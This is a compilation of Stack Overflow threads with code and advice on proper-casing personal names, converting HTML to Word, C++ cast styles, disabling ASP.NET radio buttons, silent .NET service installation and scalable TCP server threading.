A: I did a quick C# port of https://github.com/tamtamchik/namecase, which is based on Lingua::EN::NameCase. public static class CIQNameCase { static Dictionary<string, string> _exceptions = new Dictionary<string, string> { {@"\bMacEdo" ,"Macedo"}, {@"\bMacEvicius" ,"Macevicius"}, {@"\bMacHado" ,"Machado"}, {@"\bMacHar" ,"Machar"}, {@"\bMacHin" ,"Machin"}, {@"\bMacHlin" ,"Machlin"}, {@"\bMacIas" ,"Macias"}, {@"\bMacIulis" ,"Maciulis"}, {@"\bMacKie" ,"Mackie"}, {@"\bMacKle" ,"Mackle"}, {@"\bMacKlin" ,"Macklin"}, {@"\bMacKmin" ,"Mackmin"}, {@"\bMacQuarie" ,"Macquarie"} }; static Dictionary<string, string> _replacements = new Dictionary<string, string> { {@"\bAl(?=\s+\w)" , @"al"}, // al Arabic or forename Al. {@"\b(Bin|Binti|Binte)\b" , @"bin"}, // bin, binti, binte Arabic {@"\bAp\b" , @"ap"}, // ap Welsh. {@"\bBen(?=\s+\w)" , @"ben"}, // ben Hebrew or forename Ben. {@"\bDell([ae])\b" , @"dell$1"}, // della and delle Italian. {@"\bD([aeiou])\b" , @"d$1"}, // da, de, di Italian; du French; do Brasil {@"\bD([ao]s)\b" , @"d$1"}, // das, dos Brasileiros {@"\bDe([lrn])\b" , @"de$1"}, // del Italian; der/den Dutch/Flemish. {@"\bEl\b" , @"el"}, // el Greek or El Spanish. {@"\bLa\b" , @"la"}, // la French or La Spanish. {@"\bL([eo])\b" , @"l$1"}, // lo Italian; le French. {@"\bVan(?=\s+\w)" , @"van"}, // van German or forename Van. {@"\bVon\b" , @"von"} // von Dutch/Flemish }; static string[] _conjunctions = { "Y", "E", "I" }; static string _romanRegex = @"\b((?:[Xx]{1,3}|[Xx][Ll]|[Ll][Xx]{0,3})?(?:[Ii]{1,3}|[Ii][VvXx]|[Vv][Ii]{0,3})?)\b"; /// <summary> /// Case a name field into its appropriate case format /// e.g. Smith, de la Cruz, Mary-Jane, O'Brien, McTaggart /// </summary> /// <param name="nameString"></param> /// <returns></returns> public static string NameCase(string nameString) { // Capitalize nameString = Capitalize(nameString); nameString = UpdateIrish(nameString); // Fixes for "son (daughter) of" etc foreach (var replacement in _replacements.Keys) { if (Regex.IsMatch(nameString, replacement)) { Regex rgx = new Regex(replacement); nameString = rgx.Replace(nameString, _replacements[replacement]); } } nameString = UpdateRoman(nameString); nameString = FixConjunction(nameString); return nameString; } /// <summary> /// Capitalize first letters. /// </summary> /// <param name="nameString"></param> /// <returns></returns> private static string Capitalize(string nameString) { nameString = nameString.ToLower(); nameString = Regex.Replace(nameString, @"\b\w", x => x.ToString().ToUpper()); nameString = Regex.Replace(nameString, @"'\w\b", x => x.ToString().ToLower()); // Lowercase 's return nameString; } /// <summary> /// Update for Irish names. /// </summary> /// <param name="nameString"></param> /// <returns></returns> private static string UpdateIrish(string nameString) { if(Regex.IsMatch(nameString, @".*?\bMac[A-Za-z^aciozj]{2,}\b") || Regex.IsMatch(nameString, @".*?\bMc")) { nameString = UpdateMac(nameString); } return nameString; } /// <summary> /// Updates irish Mac & Mc. 
/// </summary> /// <param name="nameString"></param> /// <returns></returns> private static string UpdateMac(string nameString) { MatchCollection matches = Regex.Matches(nameString, @"\b(Ma?c)([A-Za-z]+)"); if(matches.Count == 1 && matches[0].Groups.Count == 3) { string replacement = matches[0].Groups[1].Value; replacement += matches[0].Groups[2].Value.Substring(0, 1).ToUpper(); replacement += matches[0].Groups[2].Value.Substring(1); nameString = nameString.Replace(matches[0].Groups[0].Value, replacement); // Now fix "Mac" exceptions foreach (var exception in _exceptions.Keys) { nameString = Regex.Replace(nameString, exception, _exceptions[exception]); } } return nameString; } /// <summary> /// Fix roman numeral names. /// </summary> /// <param name="nameString"></param> /// <returns></returns> private static string UpdateRoman(string nameString) { MatchCollection matches = Regex.Matches(nameString, _romanRegex); if (matches.Count > 1) { foreach(Match match in matches) { if(!string.IsNullOrEmpty(match.Value)) { nameString = Regex.Replace(nameString, match.Value, x => x.ToString().ToUpper()); } } } return nameString; } /// <summary> /// Fix Spanish conjunctions. /// </summary> /// <param name=""></param> /// <returns></returns> private static string FixConjunction(string nameString) { foreach (var conjunction in _conjunctions) { nameString = Regex.Replace(nameString, @"\b" + conjunction + @"\b", x => x.ToString().ToLower()); } return nameString; } } Usage string name_cased = CIQNameCase.NameCase("McCarthy"); This is my test method, everything seems to pass OK: [TestMethod] public void Test_NameCase_1() { string[] names = { "Keith", "Yuri's", "Leigh-Williams", "McCarthy", // Mac exceptions "Machin", "Machlin", "Machar", "Mackle", "Macklin", "Mackie", "Macquarie", "Machado", "Macevicius", "Maciulis", "Macias", "MacMurdo", // General "O'Callaghan", "St. John", "von Streit", "van Dyke", "Van", "ap Llwyd Dafydd", "al Fahd", "Al", "el Grecco", "ben Gurion", "Ben", "da Vinci", "di Caprio", "du Pont", "de Legate", "del Crond", "der Sind", "van der Post", "van den Thillart", "von Trapp", "la Poisson", "le Figaro", "Mack Knife", "Dougal MacDonald", "Ruiz y Picasso", "Dato e Iradier", "Mas i Gavarró", // Roman numerals "Henry VIII", "Louis III", "Louis XIV", "Charles II", "Fred XLIX", "Yusof bin Ishak", }; foreach(string name in names) { string name_upper = name.ToUpper(); string name_cased = CIQNameCase.NameCase(name_upper); Console.WriteLine(string.Format("name: {0} -> {1} -> {2}", name, name_upper, name_cased)); Assert.IsTrue(name == name_cased); } } A: I wrote this today to implement in an app I'm working on. I think this code is pretty self explanatory with comments. It's not 100% accurate in all cases but it will handle most of your western names easily. Examples: mary-jane => Mary-Jane o'brien => O'Brien Joël VON WINTEREGG => Joël von Winteregg jose de la acosta => Jose de la Acosta The code is extensible in that you may add any string value to the arrays at the top to suit your needs. Please study it and add any special feature that may be required. 
function name_title_case($str) { // name parts that should be lowercase in most cases $ok_to_be_lower = array('av','af','da','dal','de','del','der','di','la','le','van','der','den','vel','von'); // name parts that should be lower even if at the beginning of a name $always_lower = array('van', 'der'); // Create an array from the parts of the string passed in $parts = explode(" ", mb_strtolower($str)); foreach ($parts as $part) { (in_array($part, $ok_to_be_lower)) ? $rules[$part] = 'nocaps' : $rules[$part] = 'caps'; } // Determine the first part in the string reset($rules); $first_part = key($rules); // Loop through and cap-or-dont-cap foreach ($rules as $part => $rule) { if ($rule == 'caps') { // ucfirst() words and also takes into account apostrophes and hyphens like this: // O'brien -> O'Brien || mary-kaye -> Mary-Kaye $part = str_replace('- ','-',ucwords(str_replace('-','- ', $part))); $c13n[] = str_replace('\' ', '\'', ucwords(str_replace('\'', '\' ', $part))); } else if ($part == $first_part && !in_array($part, $always_lower)) { // If the first part of the string is ok_to_be_lower, cap it anyway $c13n[] = ucfirst($part); } else { $c13n[] = $part; } } $titleized = implode(' ', $c13n); return trim($titleized); } A: Unless I've misunderstood your question I don't think you need to roll your own, the TextInfo class can do it for you. using System.Globalization; CultureInfo.InvariantCulture.TextInfo.ToTitleCase("GeOrGE bUrdEll") Will return "George Burdell. And you can use your own culture if there's some special rules involved. Update: Michael (in a comment to this answer) pointed out that this will not work if the input is all caps since the method will assume that it is an acronym. The naive workaround for this is to .ToLower() the text before submitting it to ToTitleCase. A: @zwol: I'll post it as a separate reply. Here's an example based on ljs's post. void Main() { List<string> names = new List<string>() { "bill o'reilly", "johannes diderik van der waals", "mr. moseley-williams", "Joe VanWyck", "mcdonald's", "william the third", "hrh prince charles", "h.r.m. queen elizabeth the third", "william gates, iii", "pope leo xii", "a.k. jennings" }; names.Select(name => name.ToProperCase()).Dump(); } // http://stackoverflow.com/questions/32149/does-anyone-have-a-good-proper-case-algorithm public static class ProperCaseHelper { public static string ToProperCase(this string input) { if (IsAllUpperOrAllLower(input)) { // fix the ALL UPPERCASE or all lowercase names return string.Join(" ", input.Split(' ').Select(word => wordToProperCase(word))); } else { // leave the CamelCase or Propercase names alone return input; } } public static bool IsAllUpperOrAllLower(this string input) { return (input.ToLower().Equals(input) || input.ToUpper().Equals(input)); } private static string wordToProperCase(string word) { if (string.IsNullOrEmpty(word)) return word; // Standard case string ret = capitaliseFirstLetter(word); // Special cases: ret = properSuffix(ret, "'"); // D'Artagnon, D'Silva ret = properSuffix(ret, "."); // ??? 
ret = properSuffix(ret, "-");                       // Oscar-Meyer-Weiner
        ret = properSuffix(ret, "Mc", t => t.Length > 4);   // Scots
        ret = properSuffix(ret, "Mac", t => t.Length > 5);  // Scots except Macey

        // Special words:
        ret = specialWords(ret, "van");     // Dick van Dyke
        ret = specialWords(ret, "von");     // Baron von Bruin-Valt
        ret = specialWords(ret, "de");
        ret = specialWords(ret, "di");
        ret = specialWords(ret, "da");      // Leonardo da Vinci, Eduardo da Silva
        ret = specialWords(ret, "of");      // The Grand Old Duke of York
        ret = specialWords(ret, "the");     // William the Conqueror
        ret = specialWords(ret, "HRH");     // His/Her Royal Highness
        ret = specialWords(ret, "HRM");     // His/Her Royal Majesty
        ret = specialWords(ret, "H.R.H.");  // His/Her Royal Highness
        ret = specialWords(ret, "H.R.M.");  // His/Her Royal Majesty

        ret = dealWithRomanNumerals(ret);   // William Gates, III

        return ret;
    }

    private static string properSuffix(string word, string prefix, Func<string, bool> condition = null)
    {
        if (string.IsNullOrEmpty(word)) return word;
        if (condition != null && !condition(word)) return word;

        string lowerWord = word.ToLower();
        string lowerPrefix = prefix.ToLower();

        if (!lowerWord.Contains(lowerPrefix)) return word;

        int index = lowerWord.IndexOf(lowerPrefix);

        // If the search string is at the end of the word, ignore it.
        if (index + prefix.Length == word.Length) return word;

        return word.Substring(0, index) + prefix +
            capitaliseFirstLetter(word.Substring(index + prefix.Length));
    }

    private static string specialWords(string word, string specialWord)
    {
        if (word.Equals(specialWord, StringComparison.InvariantCultureIgnoreCase))
        {
            return specialWord;
        }
        else
        {
            return word;
        }
    }

    private static string dealWithRomanNumerals(string word)
    {
        // Roman numeral parser thanks to [djk](https://stackoverflow.com/users/785111/djk)
        // Note that it excludes the Chinese last name Xi
        return new Regex(@"\b(?!Xi\b)(X|XX|XXX|XL|L|LX|LXX|LXXX|XC|C)?(I|II|III|IV|V|VI|VII|VIII|IX)?\b", RegexOptions.IgnoreCase).Replace(word, match => match.Value.ToUpperInvariant());
    }

    private static string capitaliseFirstLetter(string word)
    {
        return char.ToUpper(word[0]) + word.Substring(1).ToLower();
    }
}

A: What programming language do you use? Many languages allow callback functions for regular expression matches. These can be used to proper-case the match easily. The regular expression that would be used is quite simple; you just have to match all word characters, like so: /\w+/ Alternatively, you can already extract the first character as an extra match: /(\w)(\w*)/ Now you can access the first character and the successive characters in the match separately. The callback function can then simply return a concatenation of the hits. In pseudo Python (I don't actually know Python): def make_proper(match): return match[1].to_upper + match[2] Incidentally, this would also handle the case of "O'Reilly" because "O" and "Reilly" would be matched separately and both proper-cased. There are, however, other special cases that are not handled well by the algorithm, e.g. "McDonald's" or generally any apostrophed word. The algorithm would produce "Mcdonald'S" for the latter. Special handling for apostrophes could be implemented, but that would interfere with the first case. Finding a theoretical perfect solution isn't possible. In practice, it might help to consider the length of the part after the apostrophe.
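To make the callback approach concrete, here is a minimal C# sketch of the same idea (a translation of the pseudo-Python above, shown purely as an illustration). It lowercases the input first, then uppercases the first character of each word run via a MatchEvaluator, and it shares the "Mcdonald'S" caveat just described:

using System;
using System.Text.RegularExpressions;

class RegexProperCase
{
    static void Main()
    {
        string input = "GEORGE O'REILLY";

        // Each word run is handled by a callback that uppercases the first
        // character; the apostrophe is a non-word character, so "o" and
        // "reilly" are matched (and capitalised) separately.
        string output = Regex.Replace(input.ToLower(), @"\b(\w)(\w*)",
            m => m.Groups[1].Value.ToUpper() + m.Groups[2].Value);

        Console.WriteLine(output); // George O'Reilly
    }
}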
A: Here's a perhaps naive C# implementation:-

public class ProperCaseHelper
{
    public string ToProperCase(string input)
    {
        string ret = string.Empty;

        var words = input.Split(' ');

        for (int i = 0; i < words.Length; ++i)
        {
            ret += wordToProperCase(words[i]);
            if (i < words.Length - 1) ret += " ";
        }

        return ret;
    }

    private string wordToProperCase(string word)
    {
        if (string.IsNullOrEmpty(word)) return word;

        // Standard case
        string ret = capitaliseFirstLetter(word);

        // Special cases:
        ret = properSuffix(ret, "'");
        ret = properSuffix(ret, ".");
        ret = properSuffix(ret, "Mc");
        ret = properSuffix(ret, "Mac");

        return ret;
    }

    private string properSuffix(string word, string prefix)
    {
        if (string.IsNullOrEmpty(word)) return word;

        string lowerWord = word.ToLower(), lowerPrefix = prefix.ToLower();

        if (!lowerWord.Contains(lowerPrefix)) return word;

        int index = lowerWord.IndexOf(lowerPrefix);

        // If the search string is at the end of the word, ignore it.
        if (index + prefix.Length == word.Length) return word;

        return word.Substring(0, index) + prefix +
            capitaliseFirstLetter(word.Substring(index + prefix.Length));
    }

    private string capitaliseFirstLetter(string word)
    {
        return char.ToUpper(word[0]) + word.Substring(1).ToLower();
    }
}

A: I know this thread has been open for a while, but as I was doing research for this problem I came across this nifty site, which allows you to paste in names to be capitalized quite quickly: https://dialect.ca/code/name-case/. I wanted to include it here for reference for others doing similar research/projects. They release the algorithm they have written in PHP at this link: https://dialect.ca/code/name-case/name_case.phps A preliminary test and reading of their code suggests they have been quite thorough.

A: A simple way to capitalise the first letter of each word (separated by a space):

$words = explode(" ", $string);
$result = '';
for ($i = 0; $i < count($words); $i++) {
    $s = strtolower($words[$i]);
    $s = substr_replace($s, strtoupper(substr($s, 0, 1)), 0, 1);
    $result .= "$s ";
}
$string = trim($result);

In terms of catching the "O'REILLY" example you gave, splitting the string on both spaces and ' would not work, as it would capitalise any letter that appeared after an apostrophe, i.e. the s in Fred's. So I would probably try something like:

$words = explode(" ", $string);
$result = '';
for ($i = 0; $i < count($words); $i++) {
    $s = strtolower($words[$i]);
    if (substr($s, 0, 2) === "o'") {
        $s = substr_replace($s, strtoupper(substr($s, 0, 3)), 0, 3);
    } else {
        $s = substr_replace($s, strtoupper(substr($s, 0, 1)), 0, 1);
    }
    $result .= "$s ";
}
$string = trim($result);

This should catch O'Reilly, O'Clock, O'Donnell, etc. Hope it helps. Please note this code is untested.

A: Kronoz, thank you. I found in your function that the line

if (!lowerWord.Contains(lowerPrefix)) return word;

must say

if (!lowerWord.StartsWith(lowerPrefix)) return word;

so "información" is not changed to "InforMacIón". Best, Enrique

A: I use this as the TextChanged event handler of text boxes.
Support entry of "McDonald" Public Shared Function DoProperCaseConvert(ByVal str As String, Optional ByVal allowCapital As Boolean = True) As String Dim strCon As String = "" Dim wordbreak As String = " ,.1234567890;/\-()#$%^&*€!~+=@" Dim nextShouldBeCapital As Boolean = True 'Improve to recognize all caps input 'If str.Equals(str.ToUpper) Then ' str = str.ToLower 'End If For Each s As Char In str.ToCharArray If allowCapital Then strCon = strCon & If(nextShouldBeCapital, s.ToString.ToUpper, s) Else strCon = strCon & If(nextShouldBeCapital, s.ToString.ToUpper, s.ToLower) End If If wordbreak.Contains(s.ToString) Then nextShouldBeCapital = True Else nextShouldBeCapital = False End If Next Return strCon End Function A: A lot of good answers here. Mine is pretty simple and only takes into account the names we have in our organization. You can expand it as you wish. This is not a perfect solution and will change vancouver to VanCouver, which is wrong. So tweak it if you use it. Here was my solution in C#. This hard-codes the names into the program but with a little work you could keep a text file outside of the program and read in the name exceptions (i.e. Van, Mc, Mac) and loop through them. public static String toProperName(String name) { if (name != null) { if (name.Length >= 2 && name.ToLower().Substring(0, 2) == "mc") // Changes mcdonald to "McDonald" return "Mc" + Regex.Replace(name.ToLower().Substring(2), @"\b[a-z]", m => m.Value.ToUpper()); if (name.Length >= 3 && name.ToLower().Substring(0, 3) == "van") // Changes vanwinkle to "VanWinkle" return "Van" + Regex.Replace(name.ToLower().Substring(3), @"\b[a-z]", m => m.Value.ToUpper()); return Regex.Replace(name.ToLower(), @"\b[a-z]", m => m.Value.ToUpper()); // Changes to title case but also fixes // appostrophes like O'HARE or o'hare to O'Hare } return ""; } A: You do not mention which language you would like the solution in so here is some pseudo code. Loop through each character If the previous character was an alphabet letter Make the character lower case Otherwise Make the character upper case End loop
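For what it's worth, here is a literal C# translation of that pseudocode, shown only as a sketch -- it inherits the pseudocode's limitations (for example, "mcdonald's" still comes out as "Mcdonald'S", because the letter after the apostrophe is treated as a word start):

using System.Text;

static class NaiveProperCase
{
    // Direct translation of the pseudocode above: uppercase any character
    // that does not follow a letter, lowercase everything else.
    public static string Convert(string input)
    {
        var result = new StringBuilder(input.Length);
        bool previousWasLetter = false;

        foreach (char c in input)
        {
            result.Append(previousWasLetter ? char.ToLower(c) : char.ToUpper(c));
            previousWasLetter = char.IsLetter(c);
        }

        return result.ToString();
    }
}

// Example: NaiveProperCase.Convert("GEORGE BURDELL") returns "George Burdell",
// and "O'REILLY" becomes "O'Reilly".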
{ "language": "en", "url": "https://stackoverflow.com/questions/32149", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "26" }
Q: Best way to export html to Word without having MS Word installed? Is there a way to export a simple HTML page to Word (.doc format, not .docx) without having Microsoft Word installed?

A: There's a tool called JODConverter which hooks into OpenOffice to expose its file format converters. There are versions available as a web app (it sits in Tomcat), which you post to, and as a command-line tool. I've been firing HTML at it and converting to .doc and PDF successfully. It's in a fairly big project; we haven't gone live yet, but I think I'm going to be using it. http://sourceforge.net/projects/jodconverter/

A: There is an open source project called HTMLtoWord that allows users to insert fragments of well-formed HTML (XHTML) into a Word document as formatted text. HTMLtoWord documentation

A: While it is possible to make a ".doc" Microsoft Word file, it would probably be easier and more portable to make a ".rtf" file.

A: If you are working in Java, you can convert HTML to real docx content with code I released in docx4j 2.8.0. I say "real", because the alternative is to create an HTML altChunk, which relies on Word to do the actual conversion (when the document is first opened). See the various samples prefixed ConvertInXHTML. The import process expects well-formed XML, so you might have to tidy it first.

A: If you have only simple HTML pages as you said, they can be opened with Word. Otherwise, there are some libraries which can do this, but I don't have experience with them. My last idea: if you are using ASP.NET, try adding application/msword to the header, and you can save the page as a Word document (it won't be a real Word doc, only HTML renamed to .doc so it can be opened).

A: Well, there are many third-party tools for this. I don't know if it gets any simpler than that. Examples:

* *http://htmltortf.com/ *http://www.brothersoft.com/windows-html-to-word-2008-56150.html *http://www.eprintdriver.com/to_word/HTML_to_Word_Doc.html

Also found a VBScript, but I'm guessing that requires that you have Word installed.

A: I presume from the "C#" tag you wish to achieve this programmatically. Try Aspose.Words for .NET.

A: If it's just HTML, all you need to do is change the extension to .doc and Word will open it as if it's a Word document. However, if there are images to include or JavaScript to run, it can get a little more complicated.

A: I believe OpenOffice can both open .html files and create .doc files.

A: You can open HTML files with LibreOffice Writer. Then you can export as PDF from the File menu. Browsers can also export HTML as a PDF file.

A: You can use this jQuery plugin to export to Word, but images won't work: http://www.jqueryscript.net/other/Export-Html-To-Word-Document-With-Images-Using-jQuery-Word-Export-Plugin.html
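To make the application/msword header trick mentioned above concrete, here is a minimal, hypothetical ASP.NET handler; the handler name, file name, and content are placeholders, and the result is HTML that Word agrees to open, not a true .doc file:

using System.Web;

public class HtmlToDocHandler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        // Word opens the response because of the content type; the payload
        // is still plain HTML under the hood.
        context.Response.ContentType = "application/msword";
        context.Response.AddHeader("Content-Disposition", "attachment; filename=report.doc");
        context.Response.Write("<html><body><h1>Monthly Report</h1></body></html>");
    }

    public bool IsReusable
    {
        get { return false; }
    }
}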
{ "language": "en", "url": "https://stackoverflow.com/questions/32151", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "16" }
Q: C++ cast syntax styles A question related to Regular cast vs. static_cast vs. dynamic_cast: What cast syntax style do you prefer in C++?

* *C-style cast syntax: (int)foo *C++-style cast syntax: static_cast<int>(foo) *constructor syntax: int(foo)

They may not translate to exactly the same instructions (do they?) but their effect should be the same (right?). If you're just casting between the built-in numeric types, I find C++-style cast syntax too verbose. As a former Java coder I tend to use C-style cast syntax instead, but my local C++ guru insists on using constructor syntax. What do you think?

A: Regarding this subject, I'm following the recommendations made by Scott Meyers (More Effective C++, Item 2: Prefer C++-style casts). I agree that C++-style casts are verbose, but that's what I like about them: they are very easy to spot, and they make the code easier to read (which is more important than writing). They also force you to think about what kind of cast you need, and to choose the right one, reducing the risk of mistakes. They will also help you detect errors at compile time instead of at runtime.

A: It's best practice never to use C-style casts for three main reasons:

* *as already mentioned, no checking is performed here. The programmer simply cannot know which of the various casts is used, which weakens strong typing *the new casts are intentionally visually striking. Since casts often reveal a weakness in the code, it's argued that making casts visible in the code is a good thing. *this is especially true if searching for casts with an automated tool. Finding C-style casts reliably is nearly impossible.

As palm3D noted:

I find C++-style cast syntax too verbose.

This is intentional, for the reasons given above. The constructor syntax (official name: function-style cast) is semantically the same as the C-style cast and should be avoided as well (except for variable initializations on declaration), for the same reasons. It is debatable whether this should be true even for types that define custom constructors, but in Effective C++, Meyers argues that even in those cases you should refrain from using them. To illustrate:

void f(auto_ptr<int> x);

f(static_cast<auto_ptr<int> >(new int(5))); // GOOD
f(auto_ptr<int>(new int(5)));               // BAD

The static_cast here will actually call the auto_ptr constructor.

A: Definitely C++-style. The extra typing will help prevent you from casting when you shouldn't :-)

A: I use static_cast for two reasons.

* *It's explicitly clear what's taking place. I can't read over that without realizing there's a cast going on. With C-style casts your eye can pass right over it without pause. *It's easy to search for every place in my code where I'm casting.

A: The constructor syntax. C++ is OO, constructors exist, I use them. If you feel the need to annotate these conversion ctors, you should do it for every type, not just the built-in ones. Maybe you use the 'explicit' keyword for conversion ctors, but the client syntax mimics exactly what the ctor syntax for built-in types does. Being greppable, that may be true, but what a big surprise that typing more characters makes searches easy. Why treat these ones as special? If you are writing math formulas with lots of int/unsigned/... to and from double/float - graphics - and you need to write a static_cast every time, the look of the formula gets cluttered and it becomes very hard to read. And it's an uphill battle anyway, as a lot of the time you will convert without even noticing that you are.
For downcasting pointers I do use static_cast, as of course no ctor exists by default that would do that.

A: According to Stroustrup:

The "new-style casts" were introduced to give programmers a chance to state their intentions more clearly and for the compiler to catch more errors.

So really, it's for safety, as it does extra compile-time checking.

A: C-style cast syntax does no error checking. C++-style cast syntax does some checking. When using static_cast, even if it doesn't do checking, at least you know you should be careful here.

A: C-style cast is the worst way to go. It's harder to see, ungreppable, conflates different actions that should not be conflated, and can't do everything that C++-style casts can do. They really should have removed C-style casts from the language.

A: We currently use C-style casts everywhere. I asked the other casting question, and I now see the advantage of using static_cast instead, if for no other reason than it's "greppable" (I like that term). I will probably start using that. I don't like the C++ style; it looks too much like a function call.

A: Go for C++ style and, at worst, the ugly verbose code snippets that comprise C++'s explicit typecasts will be a constant reminder of what we all know (i.e., explicit casting is bad -- it leads to the coining of expletives). Do not go with C++ style if you want to master the art of tracking runtime errors.
{ "language": "en", "url": "https://stackoverflow.com/questions/32168", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "37" }
Q: Disable asp.net radiobutton with javascript I'm trying to disable a bunch of controls with JavaScript (so that they post back values). All the controls work fine except for my radio buttons as they lose their value. In the below code which is called via a recursive function to disable all child controls the Second else (else if (control is RadioButton)) is never hit and the RadioButton control is identified as a Checkbox control. private static void DisableControl(WebControl control) { if (control is CheckBox) { ((CheckBox)control).InputAttributes.Add("disabled", "disabled"); } else if (control is RadioButton) { } else if (control is ImageButton) { ((ImageButton)control).Enabled = false; } else { control.Attributes.Add("readonly", "readonly"); } } Two Questions: 1. How do I identify which control is a radiobutton? 2. How do I disable it so that it posts back its value? A: I found 2 ways to get this to work, the below code correctly distinguishes between the RadioButton and Checkbox controls. private static void DisableControl(WebControl control) { Type controlType = control.GetType(); if (controlType == typeof(CheckBox)) { ((CheckBox)control).InputAttributes.Add("disabled", "disabled"); } else if (controlType == typeof(RadioButton)) { ((RadioButton)control).InputAttributes.Add("disabled", "true"); } else if (controlType == typeof(ImageButton)) { ((ImageButton)control).Enabled = false; } else { control.Attributes.Add("readonly", "readonly"); } } And the solution I used is to set SubmitDisabledControls="True" in the form element which is not ideal as it allows a user to fiddle with the values but is fine in my scenario. The second solution is to mimic the Disabled behavior and details can be found here: https://web.archive.org/web/20210608183803/http://aspnet.4guysfromrolla.com/articles/012506-1.aspx'>https://web.archive.org/web/20210608183803/http://aspnet.4guysfromrolla.com/articles/012506-1.aspx. A: Off the top of my head, I think you have to check the "type" attribute of the checkbox to determine if it's a radio button.
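As an aside, the reason the original else if (control is RadioButton) branch is never reached: in ASP.NET's WebControls, RadioButton actually derives from CheckBox, so control is CheckBox matches first and wins. Testing the most derived type first (or comparing GetType(), as in the accepted answer) avoids the problem. For completeness, here is a minimal sketch of the recursive walker the question alludes to; the method name and entry point are assumptions, and it simply delegates to the DisableControl method shown above:

using System.Web.UI;
using System.Web.UI.WebControls;

private static void DisableControlTree(Control parent)
{
    foreach (Control child in parent.Controls)
    {
        // Only WebControls expose the attribute collections used by DisableControl.
        WebControl webControl = child as WebControl;
        if (webControl != null)
        {
            DisableControl(webControl);
        }

        // Recurse into nested containers (panels, table cells, etc.).
        if (child.HasControls())
        {
            DisableControlTree(child);
        }
    }
}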
{ "language": "en", "url": "https://stackoverflow.com/questions/32173", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "3" }
Q: Installing a .NET service using InstallUtil I'm trying to install a .NET service I wrote. As recommended by MSDN, I'm using InstallUtil. But I have missed how I can set the default service user on the command-line or even in the service itself. Now, when InstallUtil is run, it will display a dialog asking the user for the credentials for a user. I'm trying to integrate the service installation into a larger install and need the service installation to remain silent. A: I think I may have found it. In the service itself, the automatically created ServiceProcessInstaller component has a property "Account" which can be set to "LocalService", "LocalSystem", "NetworkService" or "User". It was defaulting to "User" which must have displayed the prompt. A: As you noticed, Karim, "Account" property is the solution, here. For those interested in differences between security contexts set by this property: http://msdn.microsoft.com/en-us/library/system.serviceprocess.serviceaccount.aspx Above using InstallUtil or SC, I like the idea of creating a SELF INSTALLER: http://www.codeproject.com/KB/dotnet/WinSvcSelfInstaller.aspx even though I found this in the .Net 1.1 documentation: The ManagedInstallerClass type supports the .NET Framework infrastructure and is not intended to be used directly from your code. A: Also keep in mind the SC.exe util which does not require visual studio to be installed. You can simply copy this exe to the server you want to create the service or even run it remotely. Use the obj parameter to specify a user. Apparently there is a GUI for this tool, but I have not used it. A: Are you being asked for the account to run the service under, or for rights to install the service? For the second, installing as admin should prevent that from happening. For the first, you have to add a ServiceProcessInstaller to your Installer. I believe the design surface for a service has a link to create a Project Installer. On that designer, you can add a process installer of type System.ServiceProcess.ServiceProcessInstaller. The properties of this object allow you to set the account to use for the service. A: InstallUtil has command line switches which can avoid the prompts when using "User" as the account type. /username and /password are used configure the account at install time. Usage: installutil.exe /username=user /password=password yourservice.exe What you may want is to have a config file where the installer can read and install the service. To do so, add a service installer to your project, and overload the install method. In this method, set the username and password: public override void Install(IDictionary stateSaver) { serviceProcessInstaller1.Username="<username>"; serviceProcessInstaller1.Password="<password>"; base.Install(stateSaver); } If you try to set the username and password in the constructor, those values will be overwritten, so make sure you override "Install" to do so.
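Putting the accepted answer into code: a minimal sketch of a ProjectInstaller whose ServiceProcessInstaller has Account set ahead of time, so InstallUtil never shows the credentials dialog (the service name and start mode here are placeholders):

using System.ComponentModel;
using System.Configuration.Install;
using System.ServiceProcess;

[RunInstaller(true)]
public class ProjectInstaller : Installer
{
    public ProjectInstaller()
    {
        // LocalSystem (or LocalService/NetworkService) needs no credentials,
        // so the install stays silent; "User" is what triggers the prompt.
        ServiceProcessInstaller processInstaller = new ServiceProcessInstaller();
        processInstaller.Account = ServiceAccount.LocalSystem;

        ServiceInstaller serviceInstaller = new ServiceInstaller();
        serviceInstaller.ServiceName = "MyService"; // hypothetical name
        serviceInstaller.StartType = ServiceStartMode.Automatic;

        Installers.Add(processInstaller);
        Installers.Add(serviceInstaller);
    }
}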
{ "language": "en", "url": "https://stackoverflow.com/questions/32175", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "38" }
Q: How do you minimize the number of threads used in a TCP server application? I am looking for any strategies people use when implementing server applications that service client TCP (or UDP) requests: design patterns, implementation techniques, best practices, etc. Let's assume for the purposes of this question that the requests are relatively long-lived (several minutes) and that the traffic is time sensitive, so no delays are acceptable in responding to messages. Also, we are both servicing requests from clients and making our own connections to other servers. My platform is .NET, but since the underlying technology is the same regardless of platform, I'm interested to see answers for any language.

A: The modern approach is to make use of the operating system to multiplex many network sockets for you, freeing your application to process only active connections with traffic. Whenever you open a socket, you associate it with a selector. You use a single thread to poll that selector. Whenever data arrives, the selector will indicate which socket is active; you hand off that operation to a child thread and continue polling. This way you only need a thread for each concurrent operation. Sockets which are open but idle will not tie up a thread.

* *Using the select() and poll() methods *Building Highly Scalable Servers with Java NIO

A: A more sophisticated approach would be to use I/O completion ports (Windows). With I/O completion ports you leave it to the operating system to manage polling, which lets it potentially use a very high level of optimization with NIC driver support. Basically, you have an OS-managed queue of network operations, and you provide a callback function which is called when an operation completes. A bit like (hard-drive) DMA, but for the network. Len Holgate wrote an excellent series on I/O completion ports a few years ago on CodeProject: http://www.codeproject.com/KB/IP/jbsocketserver2.aspx And I found an article on I/O completion ports for .NET (haven't read it though): http://www.codeproject.com/KB/cs/managediocp.aspx I would also say that it is easy to use completion ports compared to trying to write a scalable alternative. The problem is that they are only available on NT (2000, XP, Vista).

A: If you were using C++ and the Win32 API directly, then I'd suggest that you read up about overlapped I/O and I/O completion ports. I have a free C++, IOCP, client/server framework with complete source code; see here for more details. Since you're using .NET, you should be looking at using the asynchronous socket methods so that you don't need to have a thread for every connection; there are several links from this blog posting of mine that may be useful starting points: http://www.lenholgate.com/blog/2005/07/disappointing-net-sockets-article-in-msdn-magazine-this-month.html (some of the best links are in the comments to the original posting!)

